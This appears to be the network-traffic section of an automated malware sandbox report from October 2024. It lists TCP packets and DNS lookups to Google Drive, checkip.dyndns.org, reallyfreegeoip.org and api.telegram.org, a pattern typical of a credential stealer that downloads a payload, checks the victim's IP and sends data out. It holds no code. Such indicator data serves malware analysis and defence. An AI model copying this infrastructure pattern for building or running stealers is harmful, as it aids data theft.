                                        Oct 8, 2024 03:32:37.887645960 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.887702942 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.888884068 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.888936996 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.891433001 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.891521931 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.891536951 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.891591072 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.891629934 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.891685963 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.892640114 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.892703056 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.894321918 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.894386053 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.894448996 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.894505024 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.894841909 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.894898891 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.896193981 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.896286964 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.898243904 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.898750067 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.898818016 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.898829937 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.901062965 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.901073933 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.901859999 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.901942968 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.901953936 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.904090881 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.904158115 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.904169083 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.904222012 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.904232025 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.905056953 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.905066967 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.905122042 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.905215025 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.905271053 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.906203985 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.906256914 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.906368971 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.906423092 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.907783031 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.907843113 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.908411026 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.908798933 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.909149885 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.910640001 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.910732985 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.910743952 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.912024975 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.912118912 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.912130117 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.912234068 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.912252903 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.912267923 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.912305117 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.912323952 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.913608074 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.915045977 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.915115118 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.915127039 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.916867971 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.916965961 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.916975975 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.916990042 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.917016983 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.917033911 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.919209003 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.921061039 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.921072006 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.921127081 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.921343088 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.921401978 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.921444893 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.921498060 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.921802998 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.921859980 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.921897888 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.921957016 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.925489902 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.925667048 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.925757885 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.928957939 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.928988934 CEST44349838216.58.206.65192.168.2.5
                                        Oct 8, 2024 03:32:37.929011106 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:37.929054022 CEST49838443192.168.2.5216.58.206.65
                                        Oct 8, 2024 03:32:38.117182970 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:38.122212887 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:38.122312069 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:38.122438908 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:38.127343893 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:38.713556051 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:38.718175888 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:38.723107100 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:40.103478909 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:40.146298885 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:40.383177042 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:40.383253098 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.383425951 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:40.384634018 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:40.384665966 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.853487968 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.853631020 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:40.857547998 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:40.857563019 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.858012915 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.861908913 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:40.903412104 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.997247934 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.997469902 CEST44349880188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:40.997634888 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.002687931 CEST49880443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.017138958 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:41.023277998 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:41.195625067 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:41.197510004 CEST49886443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.197526932 CEST44349886188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:41.197630882 CEST49886443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.197953939 CEST49886443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.197959900 CEST44349886188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:41.240067959 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:41.669749975 CEST44349886188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:41.671217918 CEST49886443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.671245098 CEST44349886188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:41.815740108 CEST44349886188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:41.815947056 CEST44349886188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:41.816009045 CEST49886443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.816458941 CEST49886443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:41.819709063 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:41.821028948 CEST4989280192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:41.824806929 CEST8049864158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:41.824872971 CEST4986480192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:41.825851917 CEST8049892158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:41.825934887 CEST4989280192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:41.826021910 CEST4989280192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:41.831625938 CEST8049892158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:43.414864063 CEST8049892158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:43.416203976 CEST49903443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:43.416233063 CEST44349903188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:43.416321039 CEST49903443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:43.416554928 CEST49903443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:43.416563034 CEST44349903188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:43.458900928 CEST4989280192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:43.882762909 CEST44349903188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:43.884653091 CEST49903443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:43.884680033 CEST44349903188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:44.011183977 CEST44349903188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:44.011476994 CEST44349903188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:44.011560917 CEST49903443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:44.012022018 CEST49903443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:44.015827894 CEST4990980192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:44.020798922 CEST8049909158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:44.021061897 CEST4990980192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:44.021061897 CEST4990980192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:44.026067019 CEST8049909158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:44.628424883 CEST8049909158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:44.632309914 CEST49912443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:44.632354021 CEST44349912188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:44.632505894 CEST49912443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:44.632600069 CEST49912443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:44.632608891 CEST44349912188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:44.677536964 CEST4990980192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:45.095315933 CEST44349912188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:45.096714020 CEST49912443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:45.096745014 CEST44349912188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:45.247262001 CEST44349912188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:45.247546911 CEST44349912188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:45.247620106 CEST49912443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:45.247900009 CEST49912443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:45.251133919 CEST4990980192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:45.252193928 CEST4991680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:45.256308079 CEST8049909158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:45.256402969 CEST4990980192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:45.257040977 CEST8049916158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:45.257118940 CEST4991680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:45.257210016 CEST4991680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:45.261955023 CEST8049916158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:45.817893028 CEST8049916158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:45.819480896 CEST49922443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:45.819542885 CEST44349922188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:45.821211100 CEST49922443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:45.825723886 CEST49922443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:45.825771093 CEST44349922188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:45.865060091 CEST4991680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:46.293072939 CEST44349922188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:46.294542074 CEST49922443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:46.294574976 CEST44349922188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:46.415699959 CEST44349922188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:46.415920973 CEST44349922188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:46.415982008 CEST49922443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:46.416230917 CEST49922443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:46.419275045 CEST4991680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:46.420192003 CEST4992780192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:46.424612045 CEST8049916158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:46.424702883 CEST4991680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:46.425028086 CEST8049927158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:46.425205946 CEST4992780192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:46.425205946 CEST4992780192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:46.430149078 CEST8049927158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:47.008312941 CEST8049927158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:47.012408018 CEST49932443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:47.012494087 CEST44349932188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:47.012592077 CEST49932443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:47.012772083 CEST49932443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:47.012798071 CEST44349932188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:47.068161964 CEST4992780192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:47.474946022 CEST44349932188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:47.489715099 CEST49932443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:47.489816904 CEST44349932188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:47.604927063 CEST44349932188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:47.605173111 CEST44349932188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:47.609081030 CEST49932443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:47.609314919 CEST49932443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:47.612327099 CEST4992780192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:47.612749100 CEST4993680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:47.617626905 CEST8049927158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:47.617733002 CEST8049936158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:47.617809057 CEST4992780192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:47.617834091 CEST4993680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:47.617928028 CEST4993680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:47.622786999 CEST8049936158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:48.179914951 CEST8049936158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:48.181097031 CEST49941443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:48.181130886 CEST44349941188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:48.181309938 CEST49941443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:48.181479931 CEST49941443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:48.181484938 CEST44349941188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:48.224440098 CEST4993680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:48.655277014 CEST44349941188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:48.657286882 CEST49941443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:48.657349110 CEST44349941188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:48.815785885 CEST44349941188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:48.816040993 CEST44349941188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:48.816128969 CEST49941443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:48.816380024 CEST49941443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:48.819920063 CEST4993680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:48.820779085 CEST4994580192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:48.825418949 CEST8049936158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:48.825488091 CEST4993680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:48.825793982 CEST8049945158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:48.825903893 CEST4994580192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:48.825970888 CEST4994580192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:48.830859900 CEST8049945158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:49.386369944 CEST8049945158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:49.387603998 CEST49951443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:49.387672901 CEST44349951188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:49.387769938 CEST49951443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:49.387973070 CEST49951443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:49.387990952 CEST44349951188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:49.427516937 CEST4994580192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:49.861855030 CEST44349951188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:49.910734892 CEST49951443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:49.910783052 CEST44349951188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:50.020678043 CEST44349951188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:50.020982027 CEST44349951188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:50.021063089 CEST49951443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:50.035044909 CEST49951443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:50.174798012 CEST4994580192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:50.175304890 CEST4995680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:50.180273056 CEST8049945158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:50.180305004 CEST8049956158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:50.180341005 CEST4994580192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:50.180377960 CEST4995680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:50.182240963 CEST4995680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:50.187057018 CEST8049956158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:50.928838968 CEST8049956158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:50.930094957 CEST49961443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:50.930138111 CEST44349961188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:50.930213928 CEST49961443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:50.930387020 CEST49961443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:50.930392981 CEST44349961188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:50.974648952 CEST4995680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:51.394473076 CEST44349961188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:51.396492004 CEST49961443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:51.396513939 CEST44349961188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:51.531846046 CEST44349961188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:51.532084942 CEST44349961188.114.96.3192.168.2.5
                                        Oct 8, 2024 03:32:51.532167912 CEST49961443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:51.532576084 CEST49961443192.168.2.5188.114.96.3
                                        Oct 8, 2024 03:32:51.576503992 CEST4995680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:51.581880093 CEST8049956158.101.44.242192.168.2.5
                                        Oct 8, 2024 03:32:51.583456993 CEST4995680192.168.2.5158.101.44.242
                                        Oct 8, 2024 03:32:51.584228039 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:51.584326982 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:51.584405899 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:51.584714890 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:51.584736109 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:52.220655918 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:52.220818043 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:52.222754002 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:52.222790003 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:52.223134041 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:52.224322081 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:52.271455050 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:52.467762947 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:52.467935085 CEST44349966149.154.167.220192.168.2.5
                                        Oct 8, 2024 03:32:52.467998981 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:52.470046043 CEST49966443192.168.2.5149.154.167.220
                                        Oct 8, 2024 03:32:58.314764977 CEST4989280192.168.2.5158.101.44.242
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 8, 2024 03:32:33.046673059 CEST5526453192.168.2.51.1.1.1
                                        Oct 8, 2024 03:32:33.054105997 CEST53552641.1.1.1192.168.2.5
                                        Oct 8, 2024 03:32:34.105588913 CEST5097153192.168.2.51.1.1.1
                                        Oct 8, 2024 03:32:34.113059044 CEST53509711.1.1.1192.168.2.5
                                        Oct 8, 2024 03:32:38.106081963 CEST5145753192.168.2.51.1.1.1
                                        Oct 8, 2024 03:32:38.113631010 CEST53514571.1.1.1192.168.2.5
                                        Oct 8, 2024 03:32:40.375366926 CEST4981653192.168.2.51.1.1.1
                                        Oct 8, 2024 03:32:40.382668018 CEST53498161.1.1.1192.168.2.5
                                        Oct 8, 2024 03:32:51.576991081 CEST5593153192.168.2.51.1.1.1
                                        Oct 8, 2024 03:32:51.583779097 CEST53559311.1.1.1192.168.2.5
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 8, 2024 03:32:33.046673059 CEST192.168.2.51.1.1.10x9529Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:34.105588913 CEST192.168.2.51.1.1.10x4712Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:38.106081963 CEST192.168.2.51.1.1.10x1dc1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:40.375366926 CEST192.168.2.51.1.1.10xf2adStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:51.576991081 CEST192.168.2.51.1.1.10x70eaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 8, 2024 03:32:33.054105997 CEST1.1.1.1192.168.2.50x9529No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:34.113059044 CEST1.1.1.1192.168.2.50x4712No error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:38.113631010 CEST1.1.1.1192.168.2.50x1dc1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                        Oct 8, 2024 03:32:38.113631010 CEST1.1.1.1192.168.2.50x1dc1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:38.113631010 CEST1.1.1.1192.168.2.50x1dc1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:38.113631010 CEST1.1.1.1192.168.2.50x1dc1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:38.113631010 CEST1.1.1.1192.168.2.50x1dc1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:38.113631010 CEST1.1.1.1192.168.2.50x1dc1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                        Oct 8, 2024 03:32:40.382668018 CEST1.1.1.1192.168.2.50xf2adNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
